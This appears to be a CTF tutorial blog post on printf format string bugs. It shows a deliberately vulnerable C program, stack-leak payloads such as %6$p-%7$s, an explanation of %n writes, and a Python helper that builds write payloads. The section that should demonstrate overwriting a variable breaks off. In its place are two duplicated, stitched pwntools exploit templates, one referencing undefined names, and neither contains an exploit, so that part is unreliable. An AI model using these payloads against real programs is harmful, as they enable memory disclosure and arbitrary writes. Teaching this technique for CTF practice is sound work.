Format string bugs in printf are a common vulnerability in pwn challenges. I recently had the chance to try two very interesting printf-related challenges in MapleCTF 2022, so I decided to write down what I learned to reinforce my own understanding of printf.
I will try to explain everything in as much detail as I can to keep the article beginner friendly.
I hope this article helps you with printf.
0x1 What is printf (string formatting)
String formatting is a way to print data by describing its layout in a string.
For example, the code below prints "Hello, printf , I'm 16 year old". The "%s" is replaced by "printf" and the "%d" is replaced by 0x10 (which is 16 in decimal).
printf("Hello, %s , I'm %d year old", "printf", 0x10);
Every sequence that starts with % is called a format specifier, and there are several different format specifiers you can use in C.
Here are some commonly used ones. Ignore %n for now; we will come back to it later.
%d      int, printed in decimal
%s      string (char *)
%ld     long int
%lld    long long int
%p      pointer
%x      unsigned int, printed in hexadecimal
%n      write the number of characters printed so far, as 4 bytes
%hn     write the number of characters printed so far, as 2 bytes
%hhn    write the number of characters printed so far, as 1 byte

%10$?   use the 10th parameter and print it in format ?
0x2 How functions are called
Before talking about printf itself, the first thing we need to know is how a function is called and how its parameters are passed.
In short, x86 pushes all parameters onto the stack, while x64 (the System V convention used on Linux) moves the first 6 parameters into registers (rdi, rsi, rdx, rcx, r8, r9) and pushes the rest onto the stack.
On x64, the stack looks like this for a call with two parameters: 100 is saved in rdi and 200 is saved in rsi. Since there are only two arguments, no extra value is pushed onto the stack.
Bar Stack (current)
RBP
RIP
Parent Stack
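To make the register/stack split concrete, here is a small Python sketch. It is only a model of the x64 System V convention for integer and pointer arguments; the helper name place_args is made up for this article, and floating-point arguments (which go through the xmm registers) are ignored.

```python
# Integer/pointer argument registers of the System V AMD64 convention,
# in the order they are filled.
SYSV_INT_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def place_args(args):
    """Return (registers, stack) for a list of integer arguments.

    Hypothetical helper: it only models where each value ends up and
    ignores floating-point arguments.
    """
    registers = dict(zip(SYSV_INT_REGS, args))
    stack = list(args[len(SYSV_INT_REGS):])  # 7th argument onwards
    return registers, stack


if __name__ == "__main__":
    # A call with the two arguments 100 and 200 only uses rdi and rsi.
    print(place_args([100, 200]))
    # With eight arguments, the last two spill onto the stack.
    print(place_args(list(range(1, 9))))
```

With two arguments the stack list stays empty, which matches the diagram above: nothing extra is pushed.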
0x2 Read the stack
basic idea
Here is a simple vulnerable program. Can you figure out a way to make it print out the string that buf points to?
#include <stdio.h>

int main(void) {
    int x = 0x1337;
    char *buf = "my super secret";
    char s[0x20];
    printf("hello here is my number %d\n", x);
    while (1) {
        puts("please enter: ");
        fgets(s, 0x20, stdin);
        puts("You Enter: ");
        printf(s); //!! here
    }
}
printf(s) gives us the opportunity. As mentioned earlier, the computer does not care which parameters you actually passed in. printf reads whatever is in the registers and on the stack.
Assume you put %p-%p-%p-%p in the string s. printf has no way of knowing that you did not pass 4 more parameters. It just reads whatever is stored in the registers and on the stack.
For example, on x64 it prints the values of rsi, rdx, rcx and r8, separated by "-" (rdi already holds the format string itself).
If we keep printing and use up all the argument registers (r9 is the last one), printf assumes the remaining parameters are on the stack, so it reads data from the stack and prints it out.
This gives us a way of leaking data from the stack.
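The rule "registers first, then the stack" can be written down as a tiny lookup. This is a sketch under a few assumptions: x64 System V, integer/pointer conversions such as %p, and rsp taken as it is right before the call instruction. The name conversion_source is hypothetical.

```python
# Registers printf consults after rdi, which already holds the format string.
REMAINING_REGS = ["rsi", "rdx", "rcx", "r8", "r9"]


def conversion_source(n):
    """Where the n-th conversion (1-based) of printf(s) reads its value.

    Model only: assumes x86-64 System V, integer/pointer conversions,
    and rsp as it is just before the call to printf.
    """
    if n < 1:
        raise ValueError("conversions are numbered from 1")
    if n <= len(REMAINING_REGS):
        return REMAINING_REGS[n - 1]
    # The 6th conversion is the first one served from the stack.
    offset = 8 * (n - len(REMAINING_REGS) - 1)
    return f"[rsp+{offset:#x}]"


if __name__ == "__main__":
    for n in range(1, 9):
        print(n, conversion_source(n))
```

So the first five conversions are "wasted" on registers, and everything from the 6th onwards walks up the stack in 8-byte steps.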
verification
Let's check with a debugger.
Right before the call to printf, the stack looks like this: x is at rsp, and buf is in the next slot, right after it.
Let's enter %p%p%p%p%p %p-%s.
The first 5 %p are used up by the remaining 5 registers,
then x and buf are printed by %p and %s.
We got exactly what we wanted.
We can also use %p%p%p%p%p %p-%p to print out the address stored in buf:
You Enter: 
0x56206ad2e2a0(nil)0x7fdee909b1e70xc(nil) 0x1337-0x562069b06004
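Notice that the first five values in this output run into each other ("0x7fdee909b1e70xc" could be split in more than one way), while the last two are easy to read because of the "-" between them. If you want to reuse leaked values in a script, it helps to separate every conversion. Below is a minimal sketch of a parser for such output; the helper name parse_pointers and the choice of "-" as the separator are my own assumptions.

```python
def parse_pointers(line, sep=b"-"):
    """Split a separator-delimited run of %p outputs into integers.

    glibc prints a null pointer as "(nil)", which is mapped to 0 here.
    """
    values = []
    for field in line.strip().split(sep):
        values.append(0 if field == b"(nil)" else int(field, 16))
    return values


if __name__ == "__main__":
    # The last two fields of the output shown above.
    x, buf_addr = parse_pointers(b"0x1337-0x562069b06004\n")
    print(hex(x), hex(buf_addr))
```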
simpler method
Using %p%p%p%p%p %p-%p is fine when we have a large input size. But what happens if the input is too short for that?
We can use %num$format to get the same result.
For example, say we want to get x and buf. From the previous part we know that x is the 6th parameter and buf is the 7th parameter.
So we can use %6$p-%7$s as a substitute, and we get the same result as with %p%p%p%p%p %p-%s.
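To see how much input the positional form saves, here is a quick Python comparison. The buffer size comes from the example program (fgets(s, 0x20, stdin) stores at most 0x1f characters); the helper names sequential and positional are made up for illustration.

```python
BUF_SIZE = 0x20            # size of s in the example program
MAX_INPUT = BUF_SIZE - 1   # fgets keeps one byte for the terminating NUL


def sequential(n, conv="p"):
    """n conversions in a row; only the last one is the value we want."""
    return "%p" * (n - 1) + "%" + conv


def positional(n, conv="p"):
    """Address the n-th parameter directly with the %num$format syntax."""
    return f"%{n}${conv}"


if __name__ == "__main__":
    print(sequential(7, "s"), positional(7, "s"))
    # Reaching the 20th parameter one %p at a time no longer fits in s.
    print(len(sequential(20)), len(positional(20)), MAX_INPUT)
```

Reaching the 20th parameter takes 40 characters the long way, which does not fit into s, but only 5 characters with %20$p.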
0x3 Write on the stack
basic idea
In order to write data with printf, we need a special feature of printf: %n, %hn, and %hhn.
Basically, %n writes the total number of characters printed so far into the int that its pointer argument points to.
For example, the following code changes x to 5.
#include <stdio.h>

int main(void) {
    int x = 0;
    printf("before, x = %d\n", x); // here x = 0
    printf("12345%n\n", &x);
    printf("after, x = %d\n", x); // this will print x = 5
    return 0;
}
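The difference between %n, %hn and %hhn is only how many bytes of the counter get stored. Here is a small Python model of that behaviour, assuming a little-endian target such as x64; simulate_write is a hypothetical helper, not part of any library.

```python
WIDTHS = {"n": 4, "hn": 2, "hhn": 1}  # bytes stored by each conversion


def simulate_write(memory, offset, printed, conv="n"):
    """Store the low bytes of `printed` the way %n, %hn or %hhn would.

    Model only: assumes a little-endian target such as x86-64.
    """
    width = WIDTHS[conv]
    value = printed % (1 << (8 * width))  # the count is truncated to the width
    memory[offset:offset + width] = value.to_bytes(width, "little")
    return memory


if __name__ == "__main__":
    for conv in ("n", "hn", "hhn"):
        mem = bytearray(b"\xff" * 4)
        print(conv, simulate_write(mem, 0, 0x11337, conv).hex())
```

Bytes outside the written width keep their old value, which is why %hn and %hhn are handy for changing only part of a variable.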
example
Let's modify the example from the read part. In this example, we need to find a way to change x to 0x1337.
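The usual shape of such a write is "print N characters, then store the counter". Here is a sketch of a payload builder for that pattern. The parameter index is an assumption on my side: it has to be the position of a parameter that holds a pointer to x, and that depends on the actual program, so the 8 below is only a placeholder. Mixing an unnumbered %c with a numbered %n is a pattern widely used against glibc, although POSIX leaves the result of mixing the two styles undefined.

```python
def write_payload(value, arg_index, conv="n"):
    """Format string that prints `value` characters, then stores the count.

    arg_index is hypothetical: it must be the position of a parameter
    that holds a pointer to the target, which depends on the program.
    """
    if value < 0:
        raise ValueError("cannot print a negative number of characters")
    # %Nc prints one character padded to a width of N, i.e. N characters.
    padding = f"%{value}c" if value > 0 else ""
    return f"{padding}%{arg_index}${conv}"


if __name__ == "__main__":
    payload = write_payload(0x1337, 8)  # 8 is a placeholder index
    print(payload, len(payload))
```

Since 0x1337 is 4919 in decimal, the payload asks printf to emit 4919 characters before the %n stores that count.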
# Set up pwntools for the correct architecture
exe = context.binary = ELF(BinaryInfo.exe)
exe_rop = ROP(exe)
if BinaryInfo.libc != "":
    libc = ELF(BinaryInfo.libc)
    libc_rop = ROP(libc)
else:
    libc = None
    libc_rop = None

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or BinaryInfo.host
port = int(args.PORT or BinaryInfo.port)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================
# Arch:     amd64-64-little
# RELRO:    Full RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      PIE enabled

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

def wait_for_debugger(io):
    # input() strips the trailing newline, so compare against "y" only
    if args.LOCAL and input("debugger?").strip() == "y":
        pid = util.proc.pidof(io)[0]
        log_print("The pid is: " + str(pid))
        util.proc.wait_for_debugger(pid)
        log_print("press enter to continue")
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host localhost --port 1442 pwintf
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('pwintf')
libc = ELF('libc.so.6')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or 'localhost'
port = int(args.PORT or 1442)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Full RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      PIE enabled